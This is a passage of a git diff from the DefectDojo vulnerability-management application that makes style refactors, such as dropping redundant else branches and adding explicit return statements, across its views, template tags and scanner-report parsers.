+ operators: {'tags': ['anchorse']} + keywords: ['some', 'space inside'] + + query: tags:anchore vulnerability_id:CVE-2020-1234 jquery + operators: {'tags': ['anchore'], 'vulnerability_id': ['CVE-2020-1234']} + keywords: ['jquery'] + """ + tests = None findings = None finding_templates = None @@ -364,44 +403,6 @@ def simple_search(request): response.delete_cookie("highlight", path="/") return response - """ - query: some keywords - operators: {} - keywords: ['some', 'keywords'] - - query: some key-word - operators: {} - keywords: ['some', 'key-word'] - - query: keyword with "space inside" - operators: {} - keywords: ['keyword', 'with', 'space inside'] - - query: tag:anchore word tags:php - operators: {'tag': ['anchore'], 'tags': ['php']} - keywords: ['word'] - - query: tags:php,magento - operators: {'tags': ['php,magento']} - keywords: [] - - query: tags:php tags:magento - operators: {'tags': ['php', 'magento']} - keywords: [] - - query: tags:"php, magento" - operators: {'tags': ['php, magento']} - keywords: [] - - query: tags:anchorse some "space inside" - operators: {'tags': ['anchorse']} - keywords: ['some', 'space inside'] - - query: tags:anchore vulnerability_id:CVE-2020-1234 jquery - operators: {'tags': ['anchore'], 'vulnerability_id': ['CVE-2020-1234']} - keywords: ['jquery'] - """ - # it's not google grade parsing, but let's do some basic stuff right def parse_search_query(clean_query): @@ -448,8 +449,7 @@ def vulnerability_id_fix(keyword): if vulnerability_ids: return " ".join(vulnerability_ids) - else: - return keyword + return keyword def apply_tag_filters(qs, operators, skip_relations=False): diff --git a/dojo/sla_config/views.py b/dojo/sla_config/views.py index f95461283fa..c07e8dadc2a 100644 --- a/dojo/sla_config/views.py +++ b/dojo/sla_config/views.py @@ -56,14 +56,13 @@ def edit_sla_config(request, slaid): "SLA Configuration Deleted.", extra_tags="alert-success") return HttpResponseRedirect(reverse("sla_config")) - else: - messages.add_message(request, - messages.ERROR, - "The Default SLA Configuration cannot be deleted.", - extra_tags="alert-danger") - return HttpResponseRedirect(reverse("sla_config")) + messages.add_message(request, + messages.ERROR, + "The Default SLA Configuration cannot be deleted.", + extra_tags="alert-danger") + return HttpResponseRedirect(reverse("sla_config")) - elif request.method == "POST": + if request.method == "POST": form = SLAConfigForm(request.POST, instance=sla_config) if form.is_valid(): form.save(commit=True) diff --git a/dojo/survey/views.py b/dojo/survey/views.py index 29b4a2fc81d..d83803f2efd 100644 --- a/dojo/survey/views.py +++ b/dojo/survey/views.py @@ -77,12 +77,11 @@ def delete_engagement_survey(request, eid, sid): "Questionnaire deleted successfully.", extra_tags="alert-success") return HttpResponseRedirect(reverse("view_engagement", args=(engagement.id, ))) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to delete Questionnaire.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Unable to delete Questionnaire.", + extra_tags="alert-danger") add_breadcrumb( title="Delete " + survey.survey.name + " Questionnaire", @@ -145,12 +144,11 @@ def answer_questionnaire(request, eid, sid): "Successfully answered, all answers valid.", extra_tags="alert-success") return HttpResponseRedirect(reverse("view_engagement", args=(engagement.id, ))) - else: - messages.add_message( - request, - messages.ERROR, - "Questionnaire has errors, please correct.", - extra_tags="alert-danger") + 
messages.add_message( + request, + messages.ERROR, + "Questionnaire has errors, please correct.", + extra_tags="alert-danger") add_breadcrumb( title="Answer " + survey.survey.name + " Survey", top_level=False, @@ -243,12 +241,11 @@ def add_questionnaire(request, eid): if "respond_survey" in request.POST: return HttpResponseRedirect(reverse("answer_questionnaire", args=(eid, survey.id))) return HttpResponseRedirect(reverse("view_engagement", args=(eid,))) - else: - messages.add_message( - request, - messages.ERROR, - "Questionnaire could not be added.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Questionnaire could not be added.", + extra_tags="alert-danger") form.fields["survey"].queryset = surveys add_breadcrumb(title="Add Questionnaire", top_level=False, request=request) @@ -290,12 +287,11 @@ def edit_questionnaire(request, sid): "Questionnaire successfully updated, you may now add/edit questions.", extra_tags="alert-success") return HttpResponseRedirect(reverse("edit_questionnaire", args=(survey.id,))) - else: - messages.add_message( - request, - messages.SUCCESS, - "No changes detected, questionnaire not updated.", - extra_tags="alert-warning") + messages.add_message( + request, + messages.SUCCESS, + "No changes detected, questionnaire not updated.", + extra_tags="alert-warning") if "add_questions" in request.POST: return HttpResponseRedirect(reverse("edit_questionnaire_questions", args=(survey.id,))) else: @@ -360,14 +356,12 @@ def create_questionnaire(request): extra_tags="alert-success") if "add_questions" in request.POST: return HttpResponseRedirect(reverse("edit_questionnaire_questions", args=(survey.id,))) - else: - return HttpResponseRedirect(reverse("questionnaire")) - else: - messages.add_message( - request, - messages.ERROR, - "Please correct any errors displayed below.", - extra_tags="alert-danger") + return HttpResponseRedirect(reverse("questionnaire")) + messages.add_message( + request, + messages.ERROR, + "Please correct any errors displayed below.", + extra_tags="alert-danger") add_breadcrumb(title="Create Questionnaire", top_level=False, request=request) return render(request, "defectDojo-engagement-survey/create_questionnaire.html", { @@ -411,12 +405,11 @@ def edit_questionnaire_questions(request, sid): "Questionnaire questions successfully saved.", extra_tags="alert-success") return HttpResponseRedirect(reverse("questionnaire")) - else: - messages.add_message( - request, - messages.ERROR, - "Questionnaire questions not saved, please correct any errors displayed below.", - extra_tags="alert-success") + messages.add_message( + request, + messages.ERROR, + "Questionnaire questions not saved, please correct any errors displayed below.", + extra_tags="alert-success") add_breadcrumb(title="Update Questionnaire Questions", top_level=False, request=request) return render(request, "defectDojo-engagement-survey/edit_survey_questions.html", { @@ -488,8 +481,7 @@ def create_question(request): "Text Question added successfully.", extra_tags="alert-success") return HttpResponseRedirect(reverse("questions")) - else: - error = True + error = True elif type == "choice": if choiceQuestionFrom.is_valid(): @@ -511,8 +503,7 @@ def create_question(request): "Choice Question added successfully.", extra_tags="alert-success") return HttpResponseRedirect(reverse("questions")) - else: - error = True + error = True if "_popup" in request.GET and not error: resp = f'' @@ -638,12 +629,11 @@ def add_empty_questionnaire(request): if "respond_survey" in 
request.POST: return HttpResponseRedirect(reverse("dashboard")) return HttpResponseRedirect(reverse("questionnaire")) - else: - messages.add_message( - request, - messages.ERROR, - "Questionnaire could not be added.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Questionnaire could not be added.", + extra_tags="alert-danger") form.fields["survey"].queryset = surveys add_breadcrumb(title="Add Empty Questionnaire", top_level=False, request=request) @@ -695,12 +685,11 @@ def delete_empty_questionnaire(request, esid): "Questionnaire deleted successfully.", extra_tags="alert-success") return HttpResponseRedirect(reverse("survey")) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to delete Questionnaire.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Unable to delete Questionnaire.", + extra_tags="alert-danger") add_breadcrumb( title="Delete " + survey.survey.name + " Questionnaire", @@ -731,12 +720,11 @@ def delete_general_questionnaire(request, esid): "Questionnaire deleted successfully.", extra_tags="alert-success") return HttpResponseRedirect(reverse("questionnaire")) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to delete questionnaire.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Unable to delete questionnaire.", + extra_tags="alert-danger") add_breadcrumb( title="Delete " + survey.survey.name + " Questionnaire", @@ -815,12 +803,11 @@ def answer_empty_survey(request, esid): extra_tags="alert-success") return HttpResponseRedirect( reverse("dashboard")) - else: - messages.add_message( - request, - messages.ERROR, - "Questionnaire has errors, please correct.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Questionnaire has errors, please correct.", + extra_tags="alert-danger") add_breadcrumb( title="Answer Empty " + engagement_survey.name + " Questionnaire", top_level=False, @@ -857,12 +844,11 @@ def engagement_empty_survey(request, esid): "Engagement created and questionnaire successfully linked.", extra_tags="alert-success") return HttpResponseRedirect(reverse("edit_engagement", args=(engagement.id, ))) - else: - messages.add_message( - request, - messages.ERROR, - "Questionnaire could not be added.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Questionnaire could not be added.", + extra_tags="alert-danger") add_breadcrumb( title="Link Questionnaire to new Engagement", top_level=False, diff --git a/dojo/system_settings/views.py b/dojo/system_settings/views.py index 3690201a050..4c952d57a0f 100644 --- a/dojo/system_settings/views.py +++ b/dojo/system_settings/views.py @@ -116,7 +116,7 @@ def get_celery_status( context["celery_msg"] = "Celery needs to have the setting CELERY_RESULT_BACKEND = 'db+sqlite:///dojo.celeryresults.sqlite' set in settings.py." 
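# Aside — a minimal sketch (hypothetical helper, not part of this patch) of the
# early-return pattern applied throughout this commit: once an if-branch
# returns, the trailing "else:" is redundant and its body can be dedented, and
# a function whose callers ignore its result (like get_celery_status here)
# ends with a bare "return" instead of an explicit "return None".
def status_label(ok: bool) -> str:
    if ok:
        return "success"
    return "danger"  # dedented: no "else" needed after the return above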
context["celery_status"] = "Unknown" - return None + return def get_template(self) -> str: return "dojo/system_settings.html" diff --git a/dojo/tags_signals.py b/dojo/tags_signals.py index f7e09fa9b0c..605996a602c 100644 --- a/dojo/tags_signals.py +++ b/dojo/tags_signals.py @@ -77,3 +77,4 @@ def get_product(instance): return instance.engagement.product if isinstance(instance, Finding): return instance.test.engagement.product + return None diff --git a/dojo/templatetags/display_tags.py b/dojo/templatetags/display_tags.py index bd0497a6f38..483e16fe4f2 100644 --- a/dojo/templatetags/display_tags.py +++ b/dojo/templatetags/display_tags.py @@ -87,6 +87,7 @@ def markdown_render(value): "markdown.extensions.toc", "markdown.extensions.tables"]) return mark_safe(bleach.clean(markdown_text, tags=markdown_tags, attributes=markdown_attrs, css_sanitizer=markdown_styles)) + return None def text_shortener(value, length): @@ -368,8 +369,7 @@ def overdue(date1): def notspecified(text): if text: return text - else: - return mark_safe('Not Specified') + return mark_safe('Not Specified') @register.tag @@ -510,32 +510,29 @@ def business_criticality_icon(value): return mark_safe(stars(1, 5, "Very Low")) if value == Product.NONE_CRITICALITY: return mark_safe(stars(0, 5, "None")) - else: - return "" # mark_safe(not_specified_icon('Business Criticality Not Specified')) + return "" # mark_safe(not_specified_icon('Business Criticality Not Specified')) @register.filter def last_value(value): if "/" in value: return value.rsplit("/")[-1:][0] - else: - return value + return value @register.filter def platform_icon(value): if value == Product.WEB_PLATFORM: return mark_safe(icon("list-alt", "Web")) - elif value == Product.DESKTOP_PLATFORM: + if value == Product.DESKTOP_PLATFORM: return mark_safe(icon("desktop", "Desktop")) - elif value == Product.MOBILE_PLATFORM: + if value == Product.MOBILE_PLATFORM: return mark_safe(icon("mobile", "Mobile")) - elif value == Product.WEB_SERVICE_PLATFORM: + if value == Product.WEB_SERVICE_PLATFORM: return mark_safe(icon("plug", "Web Service")) - elif value == Product.IOT: + if value == Product.IOT: return mark_safe(icon("random", "Internet of Things")) - else: - return "" # mark_safe(not_specified_icon('Platform Not Specified')) + return "" # mark_safe(not_specified_icon('Platform Not Specified')) @register.filter @@ -546,8 +543,7 @@ def lifecycle_icon(value): return mark_safe(icon("ship", "Sustain")) if value == Product.RETIREMENT: return mark_safe(icon("moon-o", "Retire")) - else: - return "" # mark_safe(not_specified_icon('Lifecycle Not Specified')) + return "" # mark_safe(not_specified_icon('Lifecycle Not Specified')) @register.filter @@ -564,24 +560,21 @@ def origin_icon(value): return mark_safe(icon("code", "Open Source")) if value == Product.OUTSOURCED_ORIGIN: return mark_safe(icon("globe", "Outsourced")) - else: - return "" # mark_safe(not_specified_icon('Origin Not Specified')) + return "" # mark_safe(not_specified_icon('Origin Not Specified')) @register.filter def external_audience_icon(value): if value: return mark_safe(icon("users", "External Audience")) - else: - return "" + return "" @register.filter def internet_accessible_icon(value): if value: return mark_safe(icon("cloud", "Internet Accessible")) - else: - return "" + return "" @register.filter @@ -708,9 +701,7 @@ def get_severity_count(id, table): elif table == "product": display_counts.append("Total: " + str(total) + " Active Findings") - display_counts = ", ".join([str(item) for item in display_counts]) - - return 
display_counts + return ", ".join([str(item) for item in display_counts]) @register.filter @@ -798,8 +789,7 @@ def first_vulnerability_id(finding): vulnerability_ids = finding.vulnerability_ids if vulnerability_ids: return vulnerability_ids[0] - else: - return None + return None @register.filter @@ -810,8 +800,7 @@ def additional_vulnerability_ids(finding): for vulnerability_id in vulnerability_ids[1:]: references.append(vulnerability_id) return references - else: - return None + return None @register.filter diff --git a/dojo/templatetags/event_tags.py b/dojo/templatetags/event_tags.py index 2b40868a049..ff1ffe8f068 100644 --- a/dojo/templatetags/event_tags.py +++ b/dojo/templatetags/event_tags.py @@ -80,7 +80,6 @@ def nice_title(title): pat = re.compile(r"Finding [0-9][0-9][0-9]:*") s = pat.split(title, 2) try: - ret = s[1] - return ret + return s[1] except: return title diff --git a/dojo/templatetags/get_attribute.py b/dojo/templatetags/get_attribute.py index 49f98941df0..34e06a216c0 100644 --- a/dojo/templatetags/get_attribute.py +++ b/dojo/templatetags/get_attribute.py @@ -8,5 +8,4 @@ def get_attribute(obj, name): if hasattr(obj, name): return getattr(obj, name) - else: - return "" + return "" diff --git a/dojo/templatetags/get_banner.py b/dojo/templatetags/get_banner.py index 26ab7d3bbe8..47465aa6c22 100644 --- a/dojo/templatetags/get_banner.py +++ b/dojo/templatetags/get_banner.py @@ -22,9 +22,7 @@ def get_banner_conf(attribute): value, attributes=allowed_attributes, css_sanitizer=CSSSanitizer(allowed_css_properties=["color", "font-weight"]))) - else: - return value - else: - return False + return value + return False except Exception: return False diff --git a/dojo/templatetags/get_config_setting.py b/dojo/templatetags/get_config_setting.py index 1425985c4cd..ca917968b75 100644 --- a/dojo/templatetags/get_config_setting.py +++ b/dojo/templatetags/get_config_setting.py @@ -9,7 +9,5 @@ def get_config_setting(config_setting): if hasattr(settings, config_setting): if getattr(settings, config_setting, None): return True - else: - return False - else: return False + return False diff --git a/dojo/templatetags/get_endpoint_status.py b/dojo/templatetags/get_endpoint_status.py index 2d9f09d8d14..42a5bdb8eaa 100644 --- a/dojo/templatetags/get_endpoint_status.py +++ b/dojo/templatetags/get_endpoint_status.py @@ -43,8 +43,7 @@ def endpoint_display_status(endpoint, finding): statuses.append("Mitigated") if statuses: return ", ".join(statuses) - else: - return "Active" + return "Active" @register.filter diff --git a/dojo/templatetags/get_note_status.py b/dojo/templatetags/get_note_status.py index ab5b6485858..5d719f427c7 100644 --- a/dojo/templatetags/get_note_status.py +++ b/dojo/templatetags/get_note_status.py @@ -7,3 +7,4 @@ def get_public_notes(notes): if notes: return notes.filter(private=False) + return None diff --git a/dojo/templatetags/get_notetype_availability.py b/dojo/templatetags/get_notetype_availability.py index 59673b3a4e9..4947d9a5e0f 100644 --- a/dojo/templatetags/get_notetype_availability.py +++ b/dojo/templatetags/get_notetype_availability.py @@ -7,6 +7,4 @@ def get_notetype_notes_count(notes): notes_without_type = notes.filter(note_type=None).count() notes_count = notes.count() - notes_with_type = notes_count - notes_without_type - - return notes_with_type + return notes_count - notes_without_type diff --git a/dojo/test/queries.py b/dojo/test/queries.py index 2a2cef6f8d9..28a9249d543 100644 --- a/dojo/test/queries.py +++ b/dojo/test/queries.py @@ -46,14 +46,12 @@ def 
get_authorized_tests(permission, product=None):
         engagement__product__prod_type__authorized_group=Exists(authorized_product_type_groups),
         engagement__product__authorized_group=Exists(authorized_product_groups))
-    tests = tests.filter(
+    return tests.filter(
         Q(engagement__product__prod_type__member=True)
         | Q(engagement__product__member=True)
         | Q(engagement__product__prod_type__authorized_group=True)
         | Q(engagement__product__authorized_group=True))
 
-    return tests
-
 
 def get_authorized_test_imports(permission):
     user = get_current_user()
@@ -89,10 +87,8 @@ def get_authorized_test_imports(permission):
         test__engagement__product__member=Exists(authorized_product_roles),
         test__engagement__product__prod_type__authorized_group=Exists(authorized_product_type_groups),
         test__engagement__product__authorized_group=Exists(authorized_product_groups)).order_by("id")
-    test_imports = test_imports.filter(
+    return test_imports.filter(
         Q(test__engagement__product__prod_type__member=True)
         | Q(test__engagement__product__member=True)
         | Q(test__engagement__product__prod_type__authorized_group=True)
         | Q(test__engagement__product__authorized_group=True))
-
-    return test_imports
diff --git a/dojo/test/views.py b/dojo/test/views.py
index ee492cf5505..b93ebe12933 100644
--- a/dojo/test/views.py
+++ b/dojo/test/views.py
@@ -381,12 +381,11 @@ def copy_test(request, tid):
                                 recipients=[test.engagement.lead],
                                 icon="exclamation-triangle")
             return redirect_to_return_url_or_else(request, reverse("view_engagement", args=(engagement.id, )))
-        else:
-            messages.add_message(
-                request,
-                messages.ERROR,
-                "Unable to copy test, please try again.",
-                extra_tags="alert-danger")
+        messages.add_message(
+            request,
+            messages.ERROR,
+            "Unable to copy test, please try again.",
+            extra_tags="alert-danger")
 
     product_tab = Product_Tab(product, title="Copy Test", tab="engagements")
     return render(request, "dojo/copy_object.html", {
@@ -547,9 +546,8 @@ def process_finding_form(self, request: HttpRequest, test: Test, context: dict):
             finding.save()
 
             return finding, request, True
-        else:
-            add_error_message_to_response("The form has errors, please correct them below.")
-            add_field_errors_to_response(context["form"])
+        add_error_message_to_response("The form has errors, please correct them below.")
+        add_field_errors_to_response(context["form"])
 
         return finding, request, False
 
@@ -591,8 +589,7 @@ def process_jira_form(self, request: HttpRequest, finding: Finding, context: dic
             )
 
             return request, True, push_to_jira
-        else:
-            add_field_errors_to_response(context["jform"])
+        add_field_errors_to_response(context["jform"])
 
         return request, False, False
 
@@ -672,10 +669,8 @@ def post(self, request: HttpRequest, test_id: int):
         if success:
             if "_Finished" in request.POST:
                 return HttpResponseRedirect(reverse("view_test", args=(test.id,)))
-            else:
-                return HttpResponseRedirect(reverse("add_findings", args=(test.id,)))
-        else:
-            context["form_error"] = True
+            return HttpResponseRedirect(reverse("add_findings", args=(test.id,)))
+        context["form_error"] = True
 
         # Render the form
         return render(request, self.get_template(), context)
@@ -754,11 +749,10 @@ def add_temp_finding(request, tid, fid):
                                  extra_tags="alert-success")
 
             return HttpResponseRedirect(reverse("view_test", args=(test.id,)))
-        else:
-            messages.add_message(request,
-                                 messages.ERROR,
-                                 _("The form has errors, please correct them below."),
-                                 extra_tags="alert-danger")
+        messages.add_message(request,
+                             messages.ERROR,
+                             _("The form has errors, please correct them below."),
+                             extra_tags="alert-danger")
 
     else:
         form = AddFindingForm(req_resp=None, product=test.engagement.product, initial={"active": False,
@@ -830,8 +824,7 @@ def get_form(
         """
         if request.method == "POST":
             return ReImportScanForm(request.POST, request.FILES, test=test, **kwargs)
-        else:
-            return ReImportScanForm(test=test, **kwargs)
+        return ReImportScanForm(test=test, **kwargs)
 
     def get_jira_form(
         self,
diff --git a/dojo/tool_config/factory.py b/dojo/tool_config/factory.py
index 61fce9caa51..3715a52906f 100644
--- a/dojo/tool_config/factory.py
+++ b/dojo/tool_config/factory.py
@@ -19,5 +19,4 @@ def create_API(tool_configuration):
     if tool_configuration.tool_type.name in SCAN_APIS:
         api_class = SCAN_APIS.get(tool_configuration.tool_type.name)
         return api_class(tool_configuration)
-    else:
-        return None
+    return None
diff --git a/dojo/tool_product/queries.py b/dojo/tool_product/queries.py
index 6bc23bdb98b..df95594688b 100644
--- a/dojo/tool_product/queries.py
+++ b/dojo/tool_product/queries.py
@@ -39,8 +39,6 @@ def get_authorized_tool_product_settings(permission):
         product__member=Exists(authorized_product_roles),
         product__prod_type__authorized_group=Exists(authorized_product_type_groups),
         product__authorized_group=Exists(authorized_product_groups)).order_by("id")
-    tool_product_settings = tool_product_settings.filter(
+    return tool_product_settings.filter(
         Q(product__prod_type__member=True) | Q(product__member=True)
         | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True))
-
-    return tool_product_settings
diff --git a/dojo/tool_product/views.py b/dojo/tool_product/views.py
index 2e606956b8e..def26f088d2 100644
--- a/dojo/tool_product/views.py
+++ b/dojo/tool_product/views.py
@@ -102,8 +102,7 @@ def delete_tool_product(request, pid, ttid):
                              _("Tool Product Successfully Deleted."),
                              extra_tags="alert-success")
         return HttpResponseRedirect(reverse("all_tool_product", args=(pid, )))
-    else:
-        tform = ToolProductSettingsForm(instance=tool_product)
+    tform = ToolProductSettingsForm(instance=tool_product)
     product_tab = Product_Tab(product,
                               title=_("Delete Product Tool Configuration"),
                               tab="settings")
diff --git a/dojo/tools/acunetix/parse_acunetix_xml.py b/dojo/tools/acunetix/parse_acunetix_xml.py
index 22171bf24b1..4b86d947318 100644
--- a/dojo/tools/acunetix/parse_acunetix_xml.py
+++ b/dojo/tools/acunetix/parse_acunetix_xml.py
@@ -145,8 +145,7 @@ def get_cwe_number(self, cwe):
         """
         if cwe is None:
             return None
-        else:
-            return int(cwe.split("-")[1])
+        return int(cwe.split("-")[1])
 
     def get_severity(self, severity):
         """
@@ -156,14 +155,13 @@ def get_severity(self, severity):
         """
         if severity == "high":
             return "High"
-        elif severity == "medium":
+        if severity == "medium":
             return "Medium"
-        elif severity == "low":
+        if severity == "low":
             return "Low"
-        elif severity == "informational":
+        if severity == "informational":
             return "Info"
-        else:
-            return "Critical"
+        return "Critical"
 
     def get_false_positive(self, false_p):
         """
@@ -173,5 +171,4 @@ def get_false_positive(self, false_p):
         """
         if false_p:
             return True
-        else:
-            return False
+        return False
diff --git a/dojo/tools/acunetix/parser.py b/dojo/tools/acunetix/parser.py
index 289496a03f8..789fc23607d 100644
--- a/dojo/tools/acunetix/parser.py
+++ b/dojo/tools/acunetix/parser.py
@@ -17,5 +17,6 @@ def get_description_for_scan_types(self, scan_type):
     def get_findings(self, filename, test):
         if ".xml" in str(filename):
             return AcunetixXMLParser().get_findings(filename, test)
-        elif ".json" in str(filename):
+        if ".json" in str(filename):
             return AcunetixJSONParser().get_findings(filename, test)
+        return None
diff --git a/dojo/tools/anchore_grype/parser.py b/dojo/tools/anchore_grype/parser.py
index c457f63e65f..48e18b686e0 100644
--- a/dojo/tools/anchore_grype/parser.py
+++ b/dojo/tools/anchore_grype/parser.py
@@ -187,10 +187,9 @@ def get_findings(self, file, test):
     def _convert_severity(self, val):
         if "Unknown" == val:
             return "Info"
-        elif "Negligible" == val:
+        if "Negligible" == val:
             return "Info"
-        else:
-            return val.title()
+        return val.title()
 
     def get_cvss(self, cvss):
         if cvss:
@@ -213,5 +212,4 @@ def get_vulnerability_ids(self, vuln_id, related_vulnerabilities):
                     vulnerability_ids.append(related_vulnerability.get("id"))
         if vulnerability_ids:
             return vulnerability_ids
-        else:
-            return None
+        return None
diff --git a/dojo/tools/api_blackduck/api_client.py b/dojo/tools/api_blackduck/api_client.py
index 47a49643b11..b354f85d753 100644
--- a/dojo/tools/api_blackduck/api_client.py
+++ b/dojo/tools/api_blackduck/api_client.py
@@ -36,11 +36,13 @@ def get_project_by_name(self, project_name):
         for project in self.client.get_resource("projects"):
             if project["name"] == project_name:
                 return project
+        return None
 
     def get_version_by_name(self, project, version_name):
         for version in self.client.get_resource("versions", project):
             if version["versionName"] == version_name:
                 return version
+        return None
 
     def get_vulnerable_bom_components(self, version):
         return self.client.get_resource("vulnerable-components", version)
diff --git a/dojo/tools/api_bugcrowd/api_client.py b/dojo/tools/api_bugcrowd/api_client.py
index bf76608380d..68e73367d1b 100644
--- a/dojo/tools/api_bugcrowd/api_client.py
+++ b/dojo/tools/api_bugcrowd/api_client.py
@@ -112,18 +112,16 @@ def test_connection(self):
                     f"you can use these as Service key 1 for filtering submissions "
                     f'You also have targets "{target_names}" that can be used in Service key 2'
                 )
-            else:
-                msg = (
-                    "Bugcrowd API test not successful, no targets were defined in Bugcrowd which is used for "
-                    f"filtering, check your configuration, HTTP response was: {response_targets.text}"
-                )
-                raise Exception(msg)
-        else:
             msg = (
-                "Bugcrowd API test not successful, could not retrieve the programs or submissions, check your "
-                f"configuration, HTTP response for programs was: {response_programs.text}, HTTP response for submissions was: {response_subs.text}"
+                "Bugcrowd API test not successful, no targets were defined in Bugcrowd which is used for "
+                f"filtering, check your configuration, HTTP response was: {response_targets.text}"
             )
             raise Exception(msg)
+        msg = (
+            "Bugcrowd API test not successful, could not retrieve the programs or submissions, check your "
+            f"configuration, HTTP response for programs was: {response_programs.text}, HTTP response for submissions was: {response_subs.text}"
+        )
+        raise Exception(msg)
 
     def test_product_connection(self, api_scan_configuration):
         submissions = []
diff --git a/dojo/tools/api_bugcrowd/parser.py b/dojo/tools/api_bugcrowd/parser.py
index f6e2fa134b2..bbff76ef4b8 100644
--- a/dojo/tools/api_bugcrowd/parser.py
+++ b/dojo/tools/api_bugcrowd/parser.py
@@ -195,13 +195,12 @@ def include_finding(self, entry):
 
         if entry["attributes"]["state"] in allowed_states:
             return True
-        else:
-            msg = (
-                "{} not in allowed bugcrowd submission states".format(
-                    entry["attributes"]["state"],
-                )
+        msg = (
+            "{} not in allowed bugcrowd submission states".format(
+                entry["attributes"]["state"],
             )
-            raise ValueError(msg)
+        )
+        raise ValueError(msg)
 
     def convert_log_timestamp(self, timestamp):
         """Convert a log entry's timestamp to a DefectDojo date"""
@@ -212,16 +211,15 @@ def convert_severity(self, bugcrowd_severity):
         """Convert severity value"""
         if bugcrowd_severity == 5:
             return "Info"
-        elif bugcrowd_severity == 4:
+        if bugcrowd_severity == 4:
             return "Low"
-        elif bugcrowd_severity == 3:
+        if bugcrowd_severity == 3:
             return "Medium"
-        elif bugcrowd_severity == 2:
+        if bugcrowd_severity == 2:
             return "High"
-        elif bugcrowd_severity == 1:
+        if bugcrowd_severity == 1:
             return "Critical"
-        else:
-            return "Info"
+        return "Info"
 
     def is_active(self, bugcrowd_state):
         return (bugcrowd_state == "unresolved") or not (
diff --git a/dojo/tools/api_cobalt/api_client.py b/dojo/tools/api_cobalt/api_client.py
index c18234ae73d..0161715c73c 100644
--- a/dojo/tools/api_cobalt/api_client.py
+++ b/dojo/tools/api_cobalt/api_client.py
@@ -41,13 +41,12 @@ def get_assets(self):
 
         if response.ok:
             return response.json().get("data")
-        else:
-            msg = (
-                "Unable to get assets due to {} - {}".format(
-                    response.status_code, response.content.decode("utf-8"),
-                )
+        msg = (
+            "Unable to get assets due to {} - {}".format(
+                response.status_code, response.content.decode("utf-8"),
             )
-            raise Exception(msg)
+        )
+        raise Exception(msg)
 
     def get_findings(self, asset_id):
         """
@@ -62,13 +61,12 @@ def get_findings(self, asset_id):
 
         if response.ok:
             return response.json()
-        else:
-            msg = (
-                "Unable to get asset findings due to {} - {}".format(
-                    response.status_code, response.content.decode("utf-8"),
-                )
+        msg = (
+            "Unable to get asset findings due to {} - {}".format(
+                response.status_code, response.content.decode("utf-8"),
             )
-            raise Exception(msg)
+        )
+        raise Exception(msg)
 
     def test_connection(self):
         # Request orgs for the org name
@@ -91,14 +89,13 @@ def test_connection(self):
             org = list(orgs)[0]
             org_name = org["resource"]["name"]
             return f'You have access to the "{org_name}" organization'
-        else:
-            msg = (
-                "Connection failed (error: {} - {})".format(
-                    response_assets.status_code,
-                    response_assets.content.decode("utf-8"),
-                )
+        msg = (
+            "Connection failed (error: {} - {})".format(
+                response_assets.status_code,
+                response_assets.content.decode("utf-8"),
             )
-            raise Exception(msg)
+        )
+        raise Exception(msg)
 
     def test_product_connection(self, api_scan_configuration):
         asset = self.get_asset(api_scan_configuration.service_key_1)
diff --git a/dojo/tools/api_cobalt/importer.py b/dojo/tools/api_cobalt/importer.py
index 068745cfee7..8c74c6c8cfe 100644
--- a/dojo/tools/api_cobalt/importer.py
+++ b/dojo/tools/api_cobalt/importer.py
@@ -16,8 +16,7 @@ class CobaltApiImporter:
 
     def get_findings(self, test):
         client, config = self.prepare_client(test)
-        findings = client.get_findings(config.service_key_1)
-        return findings
+        return client.get_findings(config.service_key_1)
 
     def prepare_client(self, test):
         product = test.engagement.product
diff --git a/dojo/tools/api_cobalt/parser.py b/dojo/tools/api_cobalt/parser.py
index fa82acabf53..5ec50de6c45 100644
--- a/dojo/tools/api_cobalt/parser.py
+++ b/dojo/tools/api_cobalt/parser.py
@@ -132,8 +132,7 @@ def include_finding(self, resource):
 
         if resource["state"] in allowed_states:
             return True
-        else:
-            return False
+        return False
 
     def convert_endpoints(self, affected_targets):
         """Convert Cobalt affected_targets into DefectDojo endpoints"""
@@ -152,16 +151,15 @@ def convert_severity(self, cobalt_severity):
         """Convert severity value"""
         if cobalt_severity == "informational":
             return "Info"
-        elif cobalt_severity == "low":
+        if cobalt_severity == "low":
            return "Low"
-        elif cobalt_severity == "medium":
+        if cobalt_severity == "medium":
            return "Medium"
-        elif 
cobalt_severity == "high": + if cobalt_severity == "high": return "High" - elif cobalt_severity == "critical": + if cobalt_severity == "critical": return "Critical" - else: - return "Info" + return "Info" def is_active(self, cobalt_state): return ( diff --git a/dojo/tools/api_edgescan/api_client.py b/dojo/tools/api_edgescan/api_client.py index e74c6b94095..c7fdc735172 100644 --- a/dojo/tools/api_edgescan/api_client.py +++ b/dojo/tools/api_edgescan/api_client.py @@ -28,6 +28,7 @@ def get_extra_options(tool_config): except (JSONDecodeError, TypeError): msg = "JSON not provided in Extras field." raise ValueError(msg) + return None def get_findings(self, asset_ids): if asset_ids: @@ -47,14 +48,12 @@ def get_findings(self, asset_ids): return response.json() def get_headers(self): - headers = { + return { "X-API-TOKEN": self.api_key, "Content-Type": "application/json", "User-Agent": "DefectDojo", } - return headers - def get_proxies(self): if self.options and "proxy" in self.options: return {"https": self.options["proxy"]} diff --git a/dojo/tools/api_edgescan/importer.py b/dojo/tools/api_edgescan/importer.py index e4e9bf0c98e..6d1ca4de90d 100644 --- a/dojo/tools/api_edgescan/importer.py +++ b/dojo/tools/api_edgescan/importer.py @@ -12,8 +12,7 @@ class EdgescanImporter: def get_findings(self, test): client, config = self.prepare_client(test) - findings = client.get_findings(config.service_key_1) - return findings + return client.get_findings(config.service_key_1) def prepare_client(self, test): product = test.engagement.product diff --git a/dojo/tools/api_sonarqube/importer.py b/dojo/tools/api_sonarqube/importer.py index 567454961eb..7e5856707d4 100644 --- a/dojo/tools/api_sonarqube/importer.py +++ b/dojo/tools/api_sonarqube/importer.py @@ -356,32 +356,31 @@ def clean_cwe(raw_html): search = re.search(r"CWE-(\d+)", raw_html) if search: return 